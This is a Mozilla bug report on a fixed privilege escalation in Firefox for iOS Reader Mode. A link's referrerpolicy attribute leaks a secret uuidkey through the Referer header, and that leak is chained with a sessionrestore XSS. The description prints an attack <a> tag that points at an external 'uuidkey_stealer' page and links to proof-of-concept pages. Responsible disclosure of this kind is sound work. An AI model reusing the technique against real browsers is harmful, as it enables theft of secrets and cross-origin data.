Privilege escalation in Firefox for iOS through <a [referrerpolicy]> in ReaderMode
Categories
(Firefox for iOS :: General, defect)
Tracking
()
| Tracking | Status | |
|---|---|---|
| fxios | 120 | --- |
People
(Reporter: sdna.muneaki.nishimura, Assigned: lmarceau)
References
()
Details
(Keywords: csectype-priv-escalation, reporter-external, sec-high, Whiteboard: [reporter-external] [client-bounty-form] [verif?])
Attachments
(3 files, 1 obsolete file)
In Firefox for iOS, privileged contents are hosted by internal://local/* URLs, and to prevent access to the internal: pages, secret "uuidkey" based protection was introduced (Bug 1263627). This protection blocks transitions to any internal://local URLs when the correct uuidkey value is not specified in the query string.
If the protection is bypassed, attacker can abuse a XSS bug in sessionrestore page (Bug 1258188) and then any cross origin web contents can be stolen as previously demonstrated (Bug 1279787). So, to prevent leakage of the secret "uuidkey" through the REFERER header, "referrer-policy" are set in some internal: pages.
But, this referrer-policy can be relaxed by overrided it with <a [referrerpolicy]>. For example, if <a referrer-policy=unsafe-url> is set, current full URL with uuidkey is sent to external hyperlink.
In Reader Mode in Firefox for iOS, <a [referrerpolicy]> attributes are not removed when rendering the page in ReaderMode. It allows an attacker to relaxthe referrer policy on the page and steal the correct "uuidkey" value to an external pagevia the REFERER header.
The following page is a demonstration of the above bug.
Open the page in ReaderMode and click a hyperlink with the text "Click Me!!" in the page.
https://csrf.jp/2023/reader-privilege-escalation.php
In the above link, the following <a> tag is set for relaxing the referrer policy.
<a href=https://csrf.jp/2023/uuidkey_stealer.php referrerpolicy=unsafe-url>Click Me!!</a>
When you open the URL in ReaderMode and click the Click Me!!, the page is transitioned to an external page, and "uuidkey" value is stolen through REFERER header. The attacker's external page exploit the XSS bug in sessionrestore page (Bug 1258188), so alert dialog with internal://local is shown in the window.
|
||
Updated•2 years ago
|
|
Reporter | |
Comment 1•2 years ago
|
||
In summary,
- Readability.js used in Reader Mode doesn't remove "referrerpolicy" attribute from <a> tags in an original page.
- <a referrerpolicy="unsafe-url"> can override <meta name="referrer" content="never"> definition in the Reader Mode HTML template.
- As a result, a secret uuidkey in a Reader Mode URL is revealed to an external page through REFERER header.
- By setting the correct uuidkey to the target URL, access to internal://local through <a [href]> is allowed.
|
||
Updated•2 years ago
|
Jira ticket for progress tracking only (no more info available in it) can be found here
|
|
Reporter | |
Comment 3•2 years ago
|
||
Thanks for handling this bug.
As far as I investigated, <a [referrerpolicy]> is preferred to <meta name=referrer> and Referrer-Policy header values. So, for fixing this bug, refferepolicy attributes need to be removed from the reader mode content.
As I mentioned above, Readability.js used to generate reader mode content doesn't remove reffererpolicy attributes. So, as recommended in the README of Readability.js, we need to use a DOM sanitizer, e.g., DOMPurify, with it.
https://github.com/mozilla/readability#security
Firefox for PC uses their own sanitizer, that removes reffererpolicy attributes properly. Similarly, I think Firefox for iOS should also use any sanitizer. As far as I tested, DOMPurify removed refererpolicy attributes from all supposed elements such as <a>, <img>`, etc., in its default configuration. It seems to me that is a good way for resolve the bug.
|
||
Comment 4•2 years ago
|
||
We have a potential fix coming up, thanks for reporting this @Muneaki
|
||
Comment 6•2 years ago
|
||
Hello, can someone help me with some steps in order to verify this issue?
I did try on v120 (35899) the latest 120 build with iPhone 13 Pro (15.7.1) when I clicked on Click Me! from this URL https://csrf.jp/2023/reader-privilege-escalation.php nothing happened.
Please note that I tried with an older build to see what happens but still nothing. There was a blank page displayed.
Is this the correct verification or how can I figure out what I need to test exactly?
|
|
Reporter | |
Comment 7•2 years ago
|
||
I made a simple reproduction code for confirmation below.
https://csrf.jp/2023/poc1861405.php
After opening this page in Reader Mode, tap the link labeled "Click Me!!".
If a hyperlink labeled "Exploit" appears with "Vulnerable" on the page , this vulnerability is reproduced.
When you tap the hyperlink, you can see an alert dialog with "1" on internal://local, then, you can confirm that XSS is fired on the privileged internal origin.
|
|
||
Comment 8•2 years ago
|
||
Thank you very much Muneaki Nishimura!
I did check with the link you provided on an older version for Firefox like v118 and yes when I did enter the reader and clicked on the Click Me!! button, and I was redirected to a page saying Vulnerable
Verified as fixed on v120 (35899) with iPhone 13 Pro (15.7.1) when I enter the reader mode and tap on Click Me!! https://csrf.jp/2023/poc1861405.php on this website, I was redirected to a page saying Not vulnerable!
|
|
||
Updated•2 years ago
|
|
|
||
Updated•2 years ago
|
|
||
Updated•2 years ago
|
|
|
||
Updated•2 years ago
|
|
||
Updated•2 years ago
|
|
Assignee | |
Comment 10•2 years ago
|
||
|
||
Updated•1 year ago
|
|
|
Reporter | |
Comment 11•1 year ago
|
||
Hello! Could you make this bug ticket accessible to the public?
As time has passed since the fix and this product is now already secure, I'd like to make this hacktivity details available for anyone to reference.
|
|
||
Updated•1 year ago
|
Description
•